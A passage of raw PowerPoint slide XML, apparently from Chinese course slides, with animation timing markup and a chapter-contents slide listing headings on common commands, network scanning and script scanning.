              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
    </p:bldLst>
  </p:timing>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Text Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071996" y="2766621"/>
            <a:ext cx="3008380" cy="662379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="1565050"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="982844"/>
              <a:ext cx="1120898" cy="842780"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="2471202"/>
            <a:ext cx="1192345" cy="672217"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="平行四边形 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="2033848"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="3407000"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="平行四边形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="3084852"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596626" y="4316986"/>
            <a:ext cx="1192345" cy="677512"/>
            <a:chOff x="2215144" y="4047039"/>
            <a:chExt cx="1244730" cy="931598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="平行四边形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="4135856"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="1582798"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4615667" y="1005461"/>
              <a:ext cx="3228975" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="953426"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="2508336"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="平行四边形 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="1647579"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="组合 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="3433872"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="2341731"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644506" y="2450133"/>
              <a:ext cx="2827146" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>.3 脚本扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
